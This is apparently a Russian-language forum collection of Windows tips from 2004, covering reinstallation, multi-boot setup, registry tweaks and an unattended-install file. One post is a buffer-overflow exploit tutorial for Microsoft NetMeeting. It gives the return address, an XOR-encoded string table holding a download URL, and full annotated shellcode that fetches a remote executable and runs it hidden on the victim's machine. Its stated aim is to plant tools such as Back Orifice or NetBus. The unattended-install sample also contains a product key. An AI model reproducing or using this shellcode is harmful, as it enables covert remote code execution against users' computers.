Windows >>> Мануал!

SUNUN · February 1, 2004

Переустановка Windows

Для установки используйте только каачественный дестрибутив, не берите диск у друзей, лучше свой, на случий переустановки. Я рекомендую использовать диски, у которых в загрузке есть дополнительные программы. Если у Вас были серьёзные проблемы с работой операционной системы, то лучше её не переустанавливать, а использовать "новую установку" (во время работы в реестре системы накапливаются ошибки. При обновлении системы ошибки сохраняются.) Устанавливать Windows необходимо из MS DOS: при установке из Windows правильно сконфигурировать систему практичкски невозможно. Для новой установки: Перезагрузите компьютер в MS DOS (лучше с загрузочного диска - для этого в BIOS в моём в Advanced BIOS Features> Fist Boot Device выберите CDROM Если загрузочного диска нет или CDROM не поддерживает загрузку с CD, то подойдёт и загрузочная дискета. Отформатируйте диск, содержащий папку Windows, команда format C: где С-имя диска. (при установке Windows98 вместо XP помните, что Windows98 не поддерживает NTFS, значит форматирования не избежать (преобразовывать не советую) в остальных случаях может быть достаточно стереть папку Windows, и фаилы уонфигуруции (см. советы) Для запуска установки введите F:setup.exe и нажмите Enter F- имя дисковвода CD дисков, или полный путь к программе установки на жёстком диске. Если программа установки при загрузке с дискеты не будет запускаться перейдите на диск "A" и введите "HELP" при помощи имеющегося там редактора найдите и откройте файл SETUP.EXE (установка Windows), выйдите из редактора и перейдите на диск с дистрибутивом Windows и допишите к возникшему пути srtup.exe и нажмите Enter. При установке Windows 2000,XP,... -пропишите путь к дестрибутиву, и введите winntsetup.exe Например C:WinXPI386>Winntus.exe Легче запускать установку из графической оболочки, такой, как Norton Comander. После проверки диска выберите папку для установки не C:WINDOWS, а какю-нибудь другую см.советы. и выполняйте указания на экране.

SUNUN · February 1, 2004

Переполнение буфера

ПЕРЕПОЛНЕНИЕ БУФЕРА WIN32: БЕСПРЕДЕЛ

Во все времена

наши операционные системы

страдали от ошибок

Неосведомлённый мир

Повернулся к Windows

для безопасности

от себя самих

Но пришло время

показать миру

что мы все равны

Использование переполнения буфера требует внимания, знаний, навыка и воображения. Мы не можем научить Вас всему вышеперечисленному. Но мы можем рассказать технологию построения собственных эксплоитов для переполнения буфера в windows 95,98,NT и 2000. Мы ставим своей целью скачать с сервера и запустить у жертвы какой-либо файл по нашему усмотрению без её ведома.

Данный документ потребует от вас знакомства с

-архитектурой процессоров x86, предпочтительно Pentium.

-базовой архитектурой Windows (вы должны знать принцип построения формата PE-Exetuable.

-Знать, что такое URL.

-Иметь представление о языке C

Так же вам потребуются следующие инструменты:

Шестнадцатеричный редактор/просмотрищик кода, такой, как HIEW.

Отладчик реального времени SoftIce.

Некоторые из инструментов, поставляемых с Visual C++, например, Dumpenv.

ОСНОВЫ

Переполнение буфера возникнет, если что-то очень большое будет помещено в переменную меньше, чем необходимо. То, что не попало в переменную, попадёт в предсказуемое место памяти. Пример кода:

void func(void)

{

int i; char buffer[256]; // *

for(i=0;i>>

В этом случае у Вас есть гораздо больше места для размещения Вашего собственного исполняемого кода. Как точно узнатьновое значение EIP, указывающее на ваш код? Берите в руки SoftICE, запускайте из-под него программу, которую ломаете и передайте ей строку, ведущую к переполнению. После сбоя вы увидите, что ESP (stack pointer) - единственный регистр, который показывает на адрес близкий к адресу нашего кода. Фактически, он указывает на адрес, где мы вышли за пределы положенного нам размера - EBP + 16 байт. Хорошо... что же мы будем делать?

Нам надо перепрыгнуть через область, занятую стеком. То есть, как правило, будет достаточно перехода по адесу ESP. Более правильный путь - установить 0xZZYYXXWW в точку кода, где есть команда jmp esp или же call esp или что-то подобное. Но. в результате издержек компиляции, такая точка может оказаться в области, недоступной процессу, с бессмысленными адресами типа 0x00. Но, при анализе MSCONF32.DLL мы обнаружили наш код в сегменте 0x6A600000 смещение 2А76:

.00002A76: 54 push esp

.00002A77: 2404 and al,004

.00002A79: 33C0 xor eax,eax

.00002A7B: 8A0A mov cl,[edx]

.00002A7D: 84C9 test cl,cl

.00002A7F: 740F je .000002A90

.00002A81: 80E930 sub cl,030 ;"0"

.00002A84: 8D0480 lea eax,[eax][eax]*4

.00002A87: 0FB6C9 movzx ecx,cl

.00002A8A: 42 inc edx

.00002A8B: 8D0441 lea eax,[ecx][eax]*2

.00002A8E: EBEB jmps .000002A7B

.00002A90: C20400 retn 00004

Непохоже, чтобы код начинался с jmp esp. Он возвращается к ESP. Выполняется PUSH ESP, затем JMPS 2A7B, поле этого переход JE 2A90 возвращает нас к RET'у. MSCONF.DLL загружен, он представлен одной версией для всех систем - соответственно адрес, куда на который мы передадим управление - 0x6A602A76. В этой строке нет ни нулей, ни возвратов каретки. Отлично. Мы переставили EIP. Процессор под нашим контролем.

Пришло время рассказать о том, как мы будем строить код эксплоита, выполняемый после переполнения буфера. Можно заметить, что нам надо втиснуть всё в 763 байта, иначе сбой произойдёт в другом месте и код не исполнится. Это так же переполнение, но немного другое ;-) - у нас даже целых два бага для исследования.

Первые 256 символов отбрасываются. Итак у нас есть 500 байт для нашего кода и неизвестная версия Windows. Так же нам неизвестны адреса функций API в NSCONF.DLL. Но для этого существует очень полезная процедура GetProcAddress. Мы найдём адрес этой процедуры, используя DUMPENV, поставляющийся вместе с VC++.

Microsoft ® COFF Binary File Dumper Version 5.10.7303

Dump of file msconf.dll

File Type: DLL

Section contains the following imports:

KERNEL32.dll

23F Sleep

183 IsBadReadPtr

17E InterlockedIncrement

.

1E CompareStringA

98 FreeLibrary

116 GetProcAddress

190 LoadLibraryA

4C DeleteCriticalSection

51 DisableThreadLibraryCalls

.

То, что надо ! GetProcAddress и LoadLibraryA. С помощью этих функций мы можем подгружать необходимые модули. Так же функции возвращают базовый адрес подгружаемого модуля.

Итак, запускаем SoftIce и ищем адреса данных функций. Они будут 0x6A60107C (LoadLibraryA), и 0x6A601078 (GetProcAddress). Всё, что нам надо = вызвать их, используя неявный вызов (call dword ptr [0x6A60107C]) они сработают так, как надо нам.

Теперь, чтобы сделать эксплоит как можно более маленьким в размере, нам надо

-Знать таблицу функций, которые мы будем использовать

-Запустить код, работающий с этой таблицей

Это сильно уменьшит размер кода и минимизирует размер используемого стека. Это важно, поскольку если использовать чересчур много PUSH или POP, мы спаровоцируем ошибку в своём эксплоите или же создадим дополнительные проблемы со стеком. А чтобы построить таблицу адресов функций, надо наперёд знать, что мы будем использовать. Вообще, нам требуется заставить нашу маленькую програмку скачать и запустить нечно большее ;-) bo server или netbus, например. Кстати, подобным способом работал широко известный эксплоит от eeye.

Чтобы загрузить URL, нам понадобятся функции InternetOpenA, InternetCloseHandle, InternetOpenUrlA, и InternetReadFile из библиотеки WININET.DLL. Так же понадобятся _lcreat, _lwrite, и _lclose из KERNEL32.DLL, чтобы записать на диск загруженный файл. GlobalAlloc понадобится, чтобы выделить место для загружаемого потока данных. WinExec и ExitProcess будут нужны, чтобы исполнить и завершить то, что наш эксплоит скачает с известного адреса и прибить RUNDLL32 до того, как он пикнет об ужасных вещах ;-).

Заметьте, что в обычной порграмме под Win32 Вы никогда не встретите вызова _lcreat и прочих устаревших функций. Но, тем не менее, они существуют и никуда не делись даже из Windows 2000.

СОЗДАНИЕ ТАБЛИЦЫ АДРЕСОВ ФУНКЦИЙ

Нам требуется обратится к фунцкиям по имени. GetProcAddress обращается к вызываемой функции либо по номеру, либо по имени. Оканчивающемуся NULL'om. Но..увы, нам невозможно иметь нулевые байты в нашем эксплоите. Но...путём простейшего применения XOR'a или ADD'a ко всем байтам эксплоита, можно добиться отсутствия в нём досадных нулей. При его запуске, естественно, происходит обратная процедура. Так же этио всё-же мало-мальская шифровка - невооружённый глаз пьяного администратора не углядит ничего подозрительного в сторке кода. Всё же это не шифровка в обычном смысле этого слова - мы пытаемся заставить эксплоит работать...

00000270: .. .. .. .. .. .. .. 4B-45 52 4E 45-4C 33 32 00 KERNEL32

00000280: 5F 6C 63 72-65 61 74 00-5F 6C 77 72-69 74 65 00 _lcreat _lwrite

00000290: 5F 6C 63 6C-6F 73 65 00-57 69 6E 45-78 65 63 00 _lclose WinExec

000002A0: 45 78 69 74-50 72 6F 63-65 73 73 00-47 6C 6F 62 ExitProcess Glob

000002B0: 61 6C 41 6C-6C 6F 63 00-57 49 4E 49-4E 45 54 00 alAlloc WININET

000002C0: 49 6E 74 65-72 6E 65 74-4F 70 65 6E-41 00 49 6E InternetOpenA In

000002D0: 74 65 72 6E-65 74 43 6C-6F 73 65 48-61 6E 64 6C ternetCloseHandl

000002E0: 65 00 49 6E-74 65 72 6E-65 74 4F 70-65 6E 55 72 e InternetOpenUr

000002F0: 6C 41 00 49-6E 74 65 72-6E 65 74 52-65 61 64 46 lA InternetReadF

00000300: 69 6C 65 00-68 74 74 70-3A 2F 2F 77-77 77 2E 6C ile http://www.l

00000310: 30 70 68 74-2E 63 6F 6D-2F 7E 64 69-6C 64 6F 67 0pht.com/~dildog

00000320: 2F 65 61 74-6D 65 2E 65-78 65 00 .. .. .. .. .. /eatme.exe

XOR'им всё это по 0x80, чтобы избавиться от нулевых байтов:

00000270: .. .. .. .. .. .. .. CB-C5 D2 CE C5-CC B3 B2 80 -+-++¦¦_З

00000280: DF EC E3 F2-E5 E1 F4 80-DF EC F7 F2-E9 F4 E5 80 __¶__Я_З_______З

00000290: DF EC E3 EC-EF F3 E5 80-D7 E9 EE C5-F8 E5 E3 80 __¶____З+__+°_¶З

000002A0: C5 F8 E9 F4-D0 F2 EF E3-E5 F3 F3 80-C7 EC EF E2 +°__-__¶___З¦___

000002B0: E1 EC C1 EC-EC EF E3 80-D7 C9 CE C9-CE C5 D4 80 Я_-___¶З+++++++З

000002C0: C9 EE F4 E5-F2 EE E5 F4-CF F0 E5 EE-C1 80 C9 EE +_______-___-З+_

000002D0: F4 E5 F2 EE-E5 F4 C3 EC-EF F3 E5 C8-E1 EE E4 EC ______+____+Я___

000002E0: E5 80 C9 EE-F4 E5 F2 EE-E5 F4 CF F0-E5 EE D5 F2 _З+_______-___+_

000002F0: EC C1 80 C9-EE F4 E5 F2-EE E5 F4 D2-E5 E1 E4 C6 _-З+_______-_Я_¦

00000300: E9 EC E5 80-E8 F4 F4 F0-BA AF AF F7-F7 F7 AE EC ___З____¦»»___«_

00000310: B0 F0 E8 F4-AE E3 EF ED-AF FE E4 E9-EC E4 EF E7 ____«¶__»_______

00000320: AF E5 E1 F4-ED E5 AE E5-F8 E5 80 .. .. .. .. .. »_Я___

Итак, первая задача после успешного пуска - раскодировать всё это:

00000146: 33C9 xor ecx,ecx; обнулить ecx

00000148: B88053FF63 mov eax,063FF5380 ;"c_SЗ"

0000014D: 2C80 sub al,080 ;"З"

0000014F: C1C018 rol eax,018

Устаноить EAX на конец наших данных в памяти.

00000152: B1B4 mov cl,0B4 ;"¦"

ECX установлен в 0x000000B4, количество байт, которые будем XORить.

00000154: 48 dec eax

00000155: 803080 xor b,[eax],080 ;"З"

00000158: E2FA loop 000000154 ---------- (1)

Это и есть цикл, раскодируюий наши данные.

УСТАНОВКА ТАБЛИЦЫ ФУНКЦИЙ

0000015A: BE7C10606A mov esi,06A60107C

0000015F: 50 push eax

00000160: 50 push eax

00000161: FF16 call d,[esi]

00000163: 8BF0 mov esi,eax

Этот код вызывает LoadModule. EAX есть первый аргумент этой функции,

который указывает на строку "KERNEL32", После отработки LoadModule,

в EAX будет хэндл модуля ядра, который мы сохраняем в ESI, чтобы он

не был затёрт другими процедурами.

00000165: 5B pop ebx

00000166: 8BFB mov edi,ebx

00000168: 6681EF4BFF sub di,0FF4B ;"_K"

Этот код установит EDI в начало нашей таблицы, которая начинается

через 181 байт после начал таблицы строк, раскодированной нами ранее.

0000016D: FC cld

0000016E: 33C9 xor ecx,ecx

00000170: 80E9FA sub cl,-006

Мы собираемся запустить цикл 6 раз, чтоб вызвать по очереди все

нужные нам процедуры. Устанавливаем счётчик ( ECX ) в 6.

00000173: 43 inc ebx

00000174: 32C0 xor al,al

00000176: D7 xlat

00000177: 84C0 test al,al

00000179: 75F8 jne 000000173 ---------- (1)

0000017B: 43 inc ebx

Этот цикл проверяет текст на нули (другими словами, вычленяя

из него отдельные строки - имена функций), и устанавливает EBX

на адрес символа, идущего после нулевого байта. Это перемещает

нас от одного имети процедуры к другому. Обратите внимание на

рациональное ( 31337ное ) использование xlat'a - вся ссылка на

область памяти в одном байте ;-).

0000017C: 51 push ecx

0000017D: 53 push ebx

0000017E: 56 push esi

0000017F: FF157810606A call d,[06A601078]

00000185: AB stosd

00000186: 59 pop ecx

Этот код возвращает адреса функций и пишет их в EDI.

00000187: E2EA loop 000000173 ---------- (2)

Итак, это конец цикла процедуры определения адресов функций из ядра.

Теперь проделаем то же самое для модуля WININET:

00000189: 43 inc ebx

0000018A: 32C0 xor al,al

0000018C: D7 xlat

0000018D: 84C0 test al,al

0000018F: 75F8 jne 000000189 ---------- (2)

00000191: 43 inc ebx

Сдвигаем указатель на имя библиотеки с строке WININET

00000192: 53 push ebx

00000193: 53 push ebx

00000194: FF157C10606A call d,[06A60107C]

0000019A: 8BF0 mov esi,eax

0000019C: 90 nop

0000019D: 90 nop

0000019E: 90 nop

0000019F: 90 nop

Этот код пишет хэндл WININET'a в ESI. NOPы остались после отладки.

000001A0: 33C9 xor ecx,ecx

000001A2: 83E9FC sub ecx,-004

000001A5: 43 inc ebx

000001A6: 32C0 xor al,al

000001A8: D7 xlat

000001A9: 84C0 test al,al

000001AB: 75F8 jne 0000001A5

000001AD: 43 inc ebx

000001AE: 51 push ecx

000001AF: 53 push ebx

000001B0: 56 push esi

000001B1: FF157810606A call d,[06A601078]

000001B7: AB stosd

000001B8: 59 pop ecx

000001B9: E2EA loop 0000001A5

Всё ! Таблица адресов функций построена ! Мы можем вызывать их, когда захотим ;-)

Теперь напишем собственно процедуру скачки файла и его запуска.

000001BB: 90 nop

000001BC: 90 nop

000001BD: 33C0 xor eax,eax

000001BF: 6648 dec ax

000001C1: D1E0 shl eax,1

000001C3: 33D2 xor edx,edx

000001C5: 50 push eax

000001C6: 52 push edx

000001C7: FF57EC call d,[edi][-0014]

000001CA: 8BF0 mov esi,eax

Выделяем 131070 байт памяти. Количество требуемых байт в EAX, и

затем мы вызываем неявно функцию GlobalAlloc, адрес которой берём

из построенной таблицы. Адрес начала выделенной нам области хранится теперь в ESI.

000001CC: 33D2 xor edx,edx

000001CE: 52 push edx

000001CF: 52 push edx

000001D0: 52 push edx

000001D1: 52 push edx

000001D2: 57 push edi

000001D3: FF57F0 call d,[edi][-0010]

Создаём хэндл Internet, вызывая функцию InternetOpenA. Передаваемые параметры

- нули, о них можно не беспокоиться. Сам хэндл будет возвращён нам в EAX, и

мы передадим его нашеё следующей функции.

000001D6: 33D2 xor edx,edx

000001D8: 52 push edx

000001D9: 52 push edx

000001DA: 52 push edx

000001DB: 90 nop

000001DC: 52 push edx

000001DD: 8BD7 mov edx,edi

000001DF: 83EA50 sub edx,050 ;"P"

000001E2: 90 nop

000001E3: 90 nop

000001E4: 90 nop

000001E5: 52 push edx

000001E6: 50 push eax

000001E7: FF57F8 call d,[edi][-0008]

Этот код вызовет InternetOpenUrlA (по таблице [EDI-0x08]), открывая наш

URL... тип - какой угодно, HTTP, FTP, FILE, GOPHER...

000001EA: 57 push edi

000001EB: 33D2 xor edx,edx

000001ED: 664A dec dx

000001EF: D1E2 shl edx,1

000001F1: 52 push edx

000001F2: 56 push esi

000001F3: 50 push eax

000001F4: FF57FC call d,[edi][-0004]

Запускаем InternetReadFile (по таблице - [EDI-0x04]), и загружаем

наши 131070 байт в буфер на начало которого указывает ESI

(1331070 байт). Но сначала мы сохранили в стеке EDI. Мы используем его

как счётчик скачанных байт. Это поможет нам при проверке

- всё ли удачно мы слили с сайта ?

000001F7: 90 nop

000001F8: 90 nop

000001F9: 90 nop

000001FA: 33D2 xor edx,edx

000001FC: 52 push edx

000001FD: 8BD7 mov edx,edi

000001FF: 83EA30 sub edx,030 ;"0"

00000202: 42 inc edx

00000203: 90 nop

00000204: 90 nop

00000205: 52 push edx

00000206: FF57D8 call d,[edi][-0028]

Вызвали _lcreat (по адресу в таблице [edi-0x28]), чтобы переписать

скачанный буфер в файл. Файл создаётся в директории, которая является

текущей для юзера (в нашем случае - файл e.exe создастся в

папке SpeedDial Netmeeting'a).

00000209: FF37 push d,[edi]

0000020B: 56 push esi

0000020C: 50 push eax

0000020D: 8BD8 mov ebx,eax

0000020F: FF57DC call d,[edi][-0024]

Вызов _lwrite (адрес из таблицы [edi-0x24]). Параметр - сколько

байт записать на диск. Файл создан - осталось его закрыть.

00000212: 53 push ebx

00000213: FF57E0 call d,[edi][-0020]

Закрыли. Лайнер готов, подан трап и контроль позади...

00000216: 90 nop

00000217: 90 nop

00000218: 90 nop

00000219: 33D2 xor edx,edx

0000021B: 42 inc edx

0000021C: 52 push edx

0000021D: 8BD7 mov edx,edi

0000021F: 83EA30 sub edx,030 ;"0"

00000222: 42 inc edx

00000223: 90 nop

00000224: 90 nop

00000225: 52 push edx

00000226: FF57E4 call d,[edi][-001C]

Вызвали WinExec, указав ему исполнить файл. Заметьте - первый

inc edx предназначен, чтобы определить, будет ли показано окно

(SW_SHOWNORMAL) или же не будет (SW_HIDE). Вы выбираем второй

вариант. А первый параметр функции - имя файла.

00000229: 90 nop

0000022A: 90 nop

0000022B: 90 nop

0000022C: FF57E8 call d,[edi][-0018]

ПУСК! Наш процесс заработал !

Итак, мы вкратце пояснили принципы действия overflow-эксплоитов для windows всех версий и привели рабочий код эксплоита для Microsoft NetMeeting. Кстати, подобным образом работал и overflow-эксплоит от eeye. А для совсем ленивых - готовый файлик exploit.cnf, содержащий вышепоказанный код. Работайте, смотрите, учитесь.

SUNUN · February 1, 2004

Как удалить XP с диска без потери данных? Hадо вернуться на Win9x.

Если XP стоял на NTFS, сначала нужно cконвертировать диск в FAT32. Для этого можно воспользоваться программой Partition Magic фирмы Power Quest. Затем создаем загрузочную дискету нужной версии Win9x, копируем на неё файлы fdisk.com, sys.com и загружаемся с неё. Выполняем команды fdisk /mbr и sys a: c: После этого удаляем директорию /Windows и файлы из корневого каталога, имеющие отношение к XP - ntldr, boot.ini и т.д

SUNUN · February 1, 2004

Установка Windows NT из-под Windows 9x

Если Вы хотите установить Windows NT при установленной Windows 95, то запустите DOS-сессию (command.com) и дайте команду LOCK. Это включит прямой доступ к диску, который нужен для программы установки NT. Также нужно помнить, что в этом случае надо запускать winnt.exe, а не winnt32.

SUNUN · February 1, 2004

Установка Windows 2000/XP и Windows 9x на одном компьютере

Если вы хотите установить на компьютер Windows 9x и Windows 2000/XP, то следует сначала установить Windows 9x, а затем из-под неё запустить setup.exe из дистрибутива Windows 2000/XP и выполнить установку в другой каталог, а лучше на другой раздел, иначе, например, Outlook Express и Internet Explorer нормально работать в Windows 9x не будут. После этого при загрузке компьютера у вас будет появляться меню выбора операционной системы.

Если устанавливать в обратном порядке, то Windows 9x при инсталляции затирает загрузочный сектор Windows 2000/XP. Однако эту проблему можно решить. Перед установкой Windows 9x нужно в файле MSBATCH.INF из дистрибутива (если такого файла в вашем дистрибутиве нет, создайте его) прописать следующие строки:

[setup]

CleanBoot=0

Если дистрибутив Windows 9x находится на CD (как это обычно и бывает), то скопируйте (или создайте) MSBATCH.INF на винчестер и отредактируйте там, а затем запустите программу установки Windows 9x, указав в качестве параметра полный путь к данному файлу, например:

setup.exe C:\MSBATCH.INF

В данном случае файл можно назвать как угодно, а не только MSBATCH.INF.

После установки может понадобиться прописать Windows 9x в стартовом меню Windows 2000/XP, добавив следующую строку в раздел [operating systems] файла boot.ini:

C:\="Microsoft Windows 98"

где текст в кавычках — это то, что будет выводиться в загрузочном меню выбора ОС.

В корне системного диска необходим файлик bootsect.dos, который содержит загрузочный сектор Windows 9x. Если этот файл по какой-то причине не создался, то придётся пойти другим путём.

1. Устанавливаем Windows 9x в нормальном режиме, чтобы она перезаписала загрузочный сектор.

2. Сохраняем его (первый сектор раздела (512 байт), на котором установили Windows 9x) в файл под именем bootsect.dos с помощью Norton DiskEdit или, например, программы BOOTPART.

3. Загружаемся в программу инсталляции Windows 2000/XP, выбираем там ремонтировать текущую инсталляцию с помощью Recovery Console.

4. Восстанавливаем загрузочный сектор Windows 2000/XP командой fixboot.

5. Загружаемся в Windows 2000/XP и прописываем Windows 9x в стартовое меню в boot.ini

SUNUN · February 1, 2004

Организация загрузки некольких операционных систем с помощью загрузчика Windows 2000

С помощью загрузчика Windows 2000 можно организовать загрузку и более двух ОС. Для этого надо получить загрузочные сектора дополнительных операционных систем в виде файлов и прописать их в boot.ini, например, так:

C:\bootsect.dos="Windows 98"

C:\bootsect.lnx="Linux"

SUNUN · February 2, 2004

Форматирование первого раздела диска при сохранении Windows 2000, установленной на другом разделе.

Если требуется отформатировать первый раздел диска, не потеряв возможность загрузки Windows 2000, установленной на другом разделе, то поступить следует так. Перед форматированием сохраните файлы из корневого каталога первого раздела, нужные для загрузки Windows 2000:

ntldr — загрузчик

boot.ini — конфигурационный файл загрузчика

ntdetect.com — собирает информацию об устройствах

ntbootdd.sys — нужен только при наличии SCSI

bootfont.bin — шрифт, нужен только для локализованной версии

bootsect.dos — файл с загрузочным сектором альтернативной ОС.

После форматирования раздела скопируйте все эти файлы обратно, загрузитесь в Recovery Console Windows 2000 и восстановите загрузочный сектор Windows 2000 командой fixboot.

SUNUN · February 2, 2004

Способ установки Windows NT при проблеме на стадии детектирования оборудования

Если установка останавливается на стадии "detecting the hardware" (детектирования оборудования), то можно попробовать использовать DEBUG-версию программы NTDETECT.COM. В папке SUPPORT на CD с дистрибутивом Windows NT находится файл NTDETECT.CHK, для его применения следуйте инструкции:

1. С помощью команды Diskcopy создайте копию первого инсталляционного диска:

diskcopy a: a: /v

2. Скопируйте NTDETECT.CHK из папки SUPPORT дистрибутива на созданный диск:

copy d:\support\ntdetect.chk a:ntdetect.com

3. Запустите установку с нового диска — процесс обнаружения оборудования будет выводиться на экран (сразу будет ясно, где грабли...)

SUNUN · February 2, 2004

Как настроить IPv6 под ХР?

В XP уже встроена поддержка этого протокола, но она нигде не отражена в интерфейсе. Для его установки IPv6 достаточно набрать в командной строке install ipv6. Не переживайте, на текущие настройки TCP/IP это не окажет никакого влияния. Настройка IPv6 производится из командной строки, что бы узнать про это подробнее, просто введите ipv6 /?

SUNUN · February 2, 2004

Как спрятать имя пользователя из Welcome Screen?

Это может пригодится, например, когда на компьютере прописан пользователь, который никогда не логинится локально, только по сети. Для того что бы убрать пользователя из списка доступных пользователей нужно в реестре по адресу HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList\\\\ добавить ключ типа REG_DWORD соответствующий имени пользователя. Присвоив этому ключу значение 1 мы разрешим показывать этого пользователя в Welcome Screen, а 0 запретим. Несмотря на то что пользователя не видно, им всё равно можно залогиниться. Для этого дважды нажимаем Crtl+Alt+Del, открывается классическое окно логона, вводим имя, пароль, и логинимся

SUNUN · February 2, 2004

Долго открываются папки с большим количеством файлов (NTFS)

Когда открывается директория, то NTFS обновляет метку последнего доступа к файлам. Если файлов много и на всех надо метку обновить, то это занимает довольно много времени. Однако эту функцию можно отключить. Для этого запускаем Regеdit и по адресу HKEY_LOCAL_MACHINE -> SYSTEM -> CurrentControlSet -> Control -> FileSystem cоздаём ключ типа DWORD под названием NtfsDisableLastAccessUpdate, после чего ставим его в 1

SUNUN · February 2, 2004

Как назначить конкретные права доступа к файлам и папкам в XP Home?

B XP Home Simple File Sharing отключить нельзя, и никаких средств для этого в GIU XP Home нет. Но утилика для командной строки, которая это делает, есть. Для того что бы узнать как она работает, достаточно набрать в командной строке cacls.

SUNUN · February 2, 2004

Как создать команду,применяемую к незарегистрированным типам файлов.

Например: вы частенько сталкивались с файлами типа readme.!!!. Согласитесь довольно нудно открывать их с помощью диалога "Открыть с помощью…"

HKEY_CLASSES_ROOT\ *\ Shell\ Open\ Command = "Notepad "%1""

SUNUN · February 2, 2004

Как заменить программу блокнот на другую программу.

HKEY_CLASSES_ROOT\ Txtfile\ Shell\ Open\ Command = "C:\ Windows\ notepad "%1""

так в оригинале. Замените notepad на др. программу, только укажите полный путь к ней.

SUNUN · February 2, 2004

Как скрыть значки логических дисков.

HREY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer

создать парметр DWORD NoDrives. Установите следующие значения для скрытия дисков (значения в шестнадцатеричной системе):

A:+B: = 3

C: = 4

D: = 8

E: = 10

F: = 20

A+B+C=7

A+B+D=b

A+B+E=13

A+B+F=23

C+D=c

D+E=18 и т.д.

Скрыть все значки = 0x03ffffff

SUNUN · February 2, 2004

Как скрыть все значки с рабочего стола.

HREY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer

создать параметр DWORD NoDesktop =1 (=0 - все значки видны)

SUNUN · February 2, 2004

Запрещение различных установок и настроек Windows с помощью реестра

1. Как ограничить доступ к программам.

HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer создайте раздел RestricRun. В этом разделе создайте параметры с именами 1, 2, 3 и т.д., которые должны содержать пути и имена программ. Доступ для пользователя разрешен будет только к тем программам, которые описаны таким образом. Для разрешения доступа удалите раздел RestricRun.

Внимание: Будьте внимательны и аккуратны! А еще лучше всего научитесь восстанавливать реестр в режиме MS-DOS !!! Если в системе существует всего один пользователь и вы не укажите в списке разрешенных программ редактор реестра, то вы не сможете запускать больше никакие программы, кроме указанных в списке.

2. Как ограничить доступ к редактору реестра.

HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System создайте параметр DisableRegistryTools = 1 - доступ закрыт, 0 - открыт.

3. Как запретить вызов контекстного меню.

HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer создайте параметр NoViewContextMenu = 1 - контекстное меню запрещено, 0 - разрешено.

4. Как запретить появление всплывающих подсказок.

HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\ Advanced\ создайте параметр ShowInfoTip = 1 - запрещено, 0 - нет.

5. Как запретить команды в меню Пуск.

HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer если параметр имеет равен 1, то команда запрещена, 0 - разрешена

NoTrayContextMenu - запретить контекстное меню панели задач

NoRecentDocsHistory - не помнить недавно открытых документов

ClearRecentDocsOnExit - очищать список недавно открытых документов при выходе

NoSetActiveDesktop - удалить пункт Рабочий стол Active Desktop из подменю Настройка

NoChangeStartMenu - запретить контекстное меню в меню Пуск

NoStartMenuSubfolders- скрыть подкаталоги в меню Пуск.

6. Как запретить сеанс MS-DOS.

HKEY_CURRENT_USER\Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ WinOldApp создайте параметр Disable = 1 - запрещен, 0 -разрешен.

7. Как запретить перезагрузку в режиме MS-DOS.

HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ WinOldApp создайте параметр NoRealMode = 1 - запрещен, 0 -разрешен.

8. Как ограничить доступ к настройкам принтера.

HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer если параметр имеет равен 1, то команда запрещена, 0 - разрешена

NoDeletePrinter - запрет на удаление принтера

NoPrinterTabs - скрыты закладки в диалоге Свойства: принтер

NoAddPrinter - запрет на добавление принтера

SUNUN · February 3, 2004

Ускорение файловой системы

Ускорение файловой системы (Windows NT/2000/XP)

Можно ускорить действие файловой системы, (если позволяет оперативная память) увеличив параметр типа DWORD IoPageLockLimit в разделе

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management от заданных по умолчанию 512 КБ до 4 МБ и более.

Этот параметр представляет максимальное число байт, которые могут быть блокированы для операций I/O. Когда значение параметра равно 0, то система использует встроенный алгоритм определения необходимой памяти и использует объем 512 КБ. Установка максимального значения должна основываться на объеме памяти в Вашей системе.

Таблица рекомендуемых значений RAM (MB) IoPageLockLimit

32 4096000

64 8192000

128 16384000

256+ 65536000

SUNUN · February 3, 2004

Установка Windows(хитрости)

Я часто экспериментирую над виндой и поэтому она у меня часто слетает.

Даже Точки Восстановления системы не помогают )) И в результате прихо-

дится все ставить заново. Но надоедает постоянно прописывать одни и те же

настройки типа Язык, Региональные стандарты, Серийник, который не всегда

удается вспомнить с первого раза. Я задумался как это автоматизировать.

Долго думать не пришлось, Я вспомнил, что в Win98 был такой файлик

unnated.txt в котором можно было прописать все настройки и идти пить пиво.

В Win 2000/XP/2003 он тоже нашелся. Итак:

[unattended]

UnattendMode=FullUnattended

! OemSkipEula=Yes

OemPreInstall=Yes

OemPnDriversPath="driversIntelINF"

TargetPath=WINNT

FileSystem=ConvertNTFS

ComputerType="Advanced Configuration And Power Interface (ACPI) PC"

[GuiUnattended]

AdminPassword=YourPassword

AutoLogonCount=1

OEMSkipRegional=1

TimeZone=125

OemSkipWelcome=1

[userData]

FullName="VasyaPupkin"

OrgName=UpravlenieK

ComputerName=Server-UpravleniyaK

! ProductID=MPK8Q-JYKV4-2JCP3-74TCV-DRP8W

Проблемные места я отметил восклицательным знаком.

По названию каждого пункта можно догадаться, что он

означает и изменять приведенную выше ПРИМЕРНУЮ

конфигурацию как угодно.

SUNUN · February 3, 2004

Очень интересный файл HOSTS - рулите своим браузером (Windows XP)

